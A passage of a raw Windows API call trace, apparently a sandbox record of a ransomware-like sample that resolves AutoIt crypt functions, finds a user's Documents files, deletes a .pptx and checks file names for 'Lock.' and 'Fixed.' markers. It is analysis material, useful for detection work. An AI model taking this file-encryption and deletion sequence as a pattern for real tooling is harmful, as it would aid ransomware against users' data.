wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.486] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0265.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.486] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.487] FreeLibrary (hLibModule=0x756e0000) returned 1 [0265.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.487] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.487] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0265.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.487] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.487] CloseHandle (hObject=0x2d0) returned 1 [0265.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0265.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0265.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0265.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0265.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0265.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0265.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0265.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0265.489] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.489] CloseHandle (hObject=0x2a0) returned 1 [0265.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0265.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0265.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0265.495] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.496] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.496] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.496] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/L7MGGQIaJ.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\L7MGGQIaJ.pptx", lpFilePart=0x8cedf4*="L7MGGQIaJ.pptx") returned 0x28 [0265.496] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\L7MGGQIaJ.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\l7mggqiaj.pptx")) returned 0x20 [0265.496] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\L7MGGQIaJ.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff1f8730, ftCreationTime.dwHighDateTime=0x1d5e60c, ftLastAccessTime.dwLowDateTime=0xf907a110, ftLastAccessTime.dwHighDateTime=0x1d5ed24, ftLastWriteTime.dwLowDateTime=0xf907a110, ftLastWriteTime.dwHighDateTime=0x1d5ed24, nFileSizeHigh=0x0, nFileSizeLow=0x153c2, dwReserved0=0x1, dwReserved1=0x1c, cFileName="L7MGGQIaJ.pptx", cAlternateFileName="L7MGGQ~1.PPT")) returned 0xa87250 [0265.496] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\L7MGGQIaJ.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\l7mggqiaj.pptx")) returned 1 [0265.508] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff1f8730, ftCreationTime.dwHighDateTime=0x1d5e60c, ftLastAccessTime.dwLowDateTime=0xf907a110, ftLastAccessTime.dwHighDateTime=0x1d5ed24, ftLastWriteTime.dwLowDateTime=0xf907a110, ftLastWriteTime.dwHighDateTime=0x1d5ed24, nFileSizeHigh=0x0, nFileSizeLow=0x153c2, dwReserved0=0x1, dwReserved1=0x1c, cFileName="L7MGGQIaJ.pptx", cAlternateFileName="L7MGGQ~1.PPT")) returned 0 [0265.509] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0265.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0265.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0265.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.509] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0265.509] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0265.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0265.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0265.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0265.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0265.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0265.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0265.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0265.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0265.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0265.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0265.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0265.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0265.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e558d8 [0265.519] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/L7MGGQIaJ.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\L7MGGQIaJ.pptx", lpFilePart=0x8cf650*="L7MGGQIaJ.pptx") returned 0x28 [0265.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0265.519] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\L7MGGQIaJ.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\l7mggqiaj.pptx")) returned 0xffffffff [0265.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0265.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0265.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.519] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0265.519] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.519] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0265.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0265.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0265.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0265.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0265.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0265.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0265.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lC9iCEh8edFMc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C9iCEh8edFMc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9iCEh8edFMc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iCEh8edFMc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CEh8edFMc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Eh8edFMc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h8edFMc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8edFMc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="edFMc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dFMc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FMc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mc0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0265.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0265.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0265.520] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0265.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0265.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a) returned 0x2e55a40 [0265.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0265.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lC9iCEh8edFMc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C9iCEh8edFMc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9iCEh8edFMc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iCEh8edFMc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CEh8edFMc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Eh8edFMc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h8edFMc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8edFMc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="edFMc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dFMc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FMc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mc0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0265.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0265.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0265.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.522] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.522] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0265.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0265.523] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 